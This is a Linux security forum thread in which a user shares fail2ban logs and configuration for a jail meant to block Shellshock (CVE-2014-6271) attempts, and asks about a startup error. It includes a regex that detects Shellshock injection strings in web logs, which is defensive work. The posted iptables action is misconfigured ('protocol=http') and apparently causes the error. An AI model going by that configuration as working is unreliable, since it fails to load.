2014-10-24 04:49:40,627 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,656 fail2ban.filter : INFO   Log rotation detected for /var/log/auth.log
2014-10-24 04:49:40,766 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:40,851 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog
2014-10-24 04:49:41,121 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,411 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,450 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,617 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 04:49:41,768 fail2ban.filter : INFO   Log rotation detected for /var/log/mail.log
2014-10-24 19:02:44,194 fail2ban.actions: WARNING [ssh] Ban 222.186.21.66
2014-10-24 19:02:47,206 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:50,210 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:53,213 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,217 fail2ban.actions: WARNING [ssh] 222.186.21.66 already banned
2014-10-24 19:02:57,518 fail2ban.actions: WARNING [pam-generic] Ban 222.186.21.66
2014-10-24 21:12:44,794 fail2ban.actions: WARNING [ssh] Unban 222.186.21.66
2014-10-24 21:12:58,261 fail2ban.actions: WARNING [pam-generic] Unban 222.186.21.66
2014-10-25 04:49:39,765 fail2ban.filter : INFO   Log rotation detected for /var/log/syslog

i go and install on a newer setup

and I get a error
# cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:30:37,210 fail2ban.filter : INFO   Set findtime = 600
2014-10-25 12:30:37,210 fail2ban.actions: INFO   Set banTime = 259200
2014-10-25 12:30:37,275 fail2ban.jail   : INFO   Jail 'ssh' started
2014-10-25 12:30:37,292 fail2ban.jail   : INFO   Jail 'ssh-ddos' started
2014-10-25 12:30:37,305 fail2ban.jail   : INFO   Jail 'apache' started
2014-10-25 12:30:37,345 fail2ban.jail   : INFO   Jail 'shellshock' started
2014-10-25 12:30:37,371 fail2ban.actions.action: ERROR  iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:30:37,386 fail2ban.jail   : INFO   Jail 'asterisk-iptables' started
 
Old 10-25-2014, 11:36 AM   #13
charly78
Member
 
Registered: Aug 2012
Location: Toronto,Canada
Posts: 73

Original Poster
Rep: Reputation: Disabled
if it matters I had no error before here is the settings

# cat /etc/fail2ban/filter.d/shellshock.conf
Code:
[INCLUDES]
#before = common.conf

[Definition]
#_daemon = apache2

docroot = /var/www/html

failregex = <HOST>.*\(\s*\)\s*\{[^"]*\}\s*\;[^"]+

ignoreregex =
cat /etc/fail2ban/jail.local

Code:
[shellshock]

enabled = true
port    = http,https
filter  = shellshock
action   = iptables[name=shellshock, port=http, protocol=http]
          mail-whois[name=shellshock, dest=fail2ban@mydomain.com]
logpath = /var/log/apache*/access.log
maxretry = 1
bantime = 259200
log
cat /var/log/fail2ban.log|tail
Code:
2014-10-25 12:35:46,834 fail2ban.filter : INFO   Set findtime = 600
2014-10-25 12:35:46,834 fail2ban.actions: INFO   Set banTime = 259200
2014-10-25 12:35:46,893 fail2ban.jail   : INFO   Jail 'ssh' started
2014-10-25 12:35:46,917 fail2ban.jail   : INFO   Jail 'ssh-ddos' started
2014-10-25 12:35:46,935 fail2ban.jail   : INFO   Jail 'apache' started
2014-10-25 12:35:46,970 fail2ban.jail   : INFO   Jail 'shellshock' started
2014-10-25 12:35:46,980 fail2ban.actions.action: ERROR  iptables -N fail2ban-shellshock
iptables -A fail2ban-shellshock -j RETURN
iptables -I INPUT -p http --dport http -j fail2ban-shellshock returned 200
2014-10-25 12:35:46,997 fail2ban.jail   : INFO   Jail 'asterisk-iptables' started
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Bash "shellshock" CVE-2014-6271 CVE-2014-7169 - rated 10 ! syg00 Linux - Security 81 10-15-2014 02:11 PM
LXer: Shellshock update: bash packages that resolve CVE-2014-6271 and CVE-2014-7169 available LXer Syndicated Linux News 1 09-26-2014 01:43 PM
Bash "shellshock" CVE-2014-6271 CVE-2014-7169 - legacy system patch help Diggy Linux - Security 3 09-26-2014 01:06 PM
LXer: Flaw CVE-2014-6271 discovered in the Bash shell — update your Fedora systems LXer Syndicated Linux News 0 09-25-2014 04:41 AM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 02:41 AM.

Contact Us - Advertising Info - Rules - Privacy - LQ Merchandise - Donations - Contributing Member - LQ Sitemap -
Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Open Source Consulting | Domain Registration